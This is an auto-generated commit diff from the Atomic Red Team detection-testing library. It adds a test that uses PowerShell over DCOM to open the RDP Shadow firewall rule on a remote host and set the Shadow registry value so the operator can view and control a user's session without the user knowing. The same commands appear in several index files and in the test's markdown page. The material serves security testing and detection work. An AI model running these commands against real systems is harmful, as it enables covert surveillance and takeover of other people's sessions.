Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1563-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1564-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -321,6 +321,7 @@ defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-
 defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
 defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
+defense-evasion,T1112,Modify Registry,72,Setting Shadow key in Registry for RDP Shadowing,a50dba9f-adb7-4623-a302-002ed6676565,powershell
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -223,6 +223,7 @@ defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-
 defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
 defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
+defense-evasion,T1112,Modify Registry,72,Setting Shadow key in Registry for RDP Shadowing,a50dba9f-adb7-4623-a302-002ed6676565,powershell
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -394,6 +394,7 @@
   - Atomic Test #69: RDP Authentication Level Override [windows]
   - Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
   - Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
+  - Atomic Test #72: Setting Shadow key in Registry for RDP Shadowing [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -282,6 +282,7 @@
   - Atomic Test #69: RDP Authentication Level Override [windows]
   - Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
   - Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
+  - Atomic Test #72: Setting Shadow key in Registry for RDP Shadowing [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -13885,6 +13885,33 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Setting Shadow key in Registry for RDP Shadowing
+      auto_generated_guid: a50dba9f-adb7-4623-a302-002ed6676565
+      description: |-
+        Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
+        In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.
+        In order to configure RDP shadowing session in a quiet mode.  The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.
+        [Reference](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
+      supported_platforms:
+      - windows
+      input_arguments:
+        server_name:
+          description: The remote server that we need to shadow and have to do the
+            registry modification.
+          type: string
+          default: localhost
+      executor:
+        command: |-
+          $s= New-CimSession -Computername #{server_name} -SessionOption (New-CimSessionOption -Protocol Dcom)
+          Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s | Invoke-CimMethod -MethodName Enable
+          Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="shadow"; uValue=[uint32]2} -CimSession $s
+        cleanup_command: 'Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue
+          -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows
+          NT\Terminal Services"; sValueName="Shadow"} -CimSession $s
+
+          '
+        name: powershell
+        elevation_required: true
   T1574.008:
     technique:
       modified: '2023-05-09T14:00:00.188Z'

atomics/Indexes/windows-index.yaml

@@ -11231,6 +11231,33 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Setting Shadow key in Registry for RDP Shadowing
+      auto_generated_guid: a50dba9f-adb7-4623-a302-002ed6676565
+      description: |-
+        Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
+        In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.
+        In order to configure RDP shadowing session in a quiet mode.  The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.
+        [Reference](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
+      supported_platforms:
+      - windows
+      input_arguments:
+        server_name:
+          description: The remote server that we need to shadow and have to do the
+            registry modification.
+          type: string
+          default: localhost
+      executor:
+        command: |-
+          $s= New-CimSession -Computername #{server_name} -SessionOption (New-CimSessionOption -Protocol Dcom)
+          Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s | Invoke-CimMethod -MethodName Enable
+          Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="shadow"; uValue=[uint32]2} -CimSession $s
+        cleanup_command: 'Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue
+          -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows
+          NT\Terminal Services"; sValueName="Shadow"} -CimSession $s
+
+          '
+        name: powershell
+        elevation_required: true
   T1574.008:
     technique:
       modified: '2023-05-09T14:00:00.188Z'

atomics/T1112/T1112.md

@@ -152,6 +152,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #71 - Disable Windows Prefetch Through Registry](#atomic-test-71---disable-windows-prefetch-through-registry)
 
+- [Atomic Test #72 - Setting Shadow key in Registry for RDP Shadowing](#atomic-test-72---setting-shadow-key-in-registry-for-rdp-shadowing)
+
 
 <br/>
 
@@ -2617,4 +2619,46 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #72 - Setting Shadow key in Registry for RDP Shadowing
+Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
+In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.
+In order to configure RDP shadowing session in a quiet mode.  The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.
+[Reference](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a50dba9f-adb7-4623-a302-002ed6676565
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| server_name | The remote server that we need to shadow and have to do the registry modification. | string | localhost|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$s= New-CimSession -Computername #{server_name} -SessionOption (New-CimSessionOption -Protocol Dcom)
+Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s | Invoke-CimMethod -MethodName Enable
+Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="shadow"; uValue=[uint32]2} -CimSession $s
+```
+
+#### Cleanup Commands:
+```powershell
+Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="Shadow"} -CimSession $s
+```
+
+
+
+
+
 <br/>

atomics/T1112/T1112.yaml

@@ -1101,6 +1101,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: Setting Shadow key in Registry for RDP Shadowing
+  auto_generated_guid: a50dba9f-adb7-4623-a302-002ed6676565
   description: |-
     Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
     In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.

atomics/used_guids.txt

@@ -1611,3 +1611,4 @@ b025c580-029e-4023-888d-a42710d76934
 7979dd41-2045-48b2-a54e-b1bc2415c9da
 bf07f520-3909-4ef5-aa22-877a50f2f77b
 3e1858ee-3550-401c-86ec-5e70ed79295b
+a50dba9f-adb7-4623-a302-002ed6676565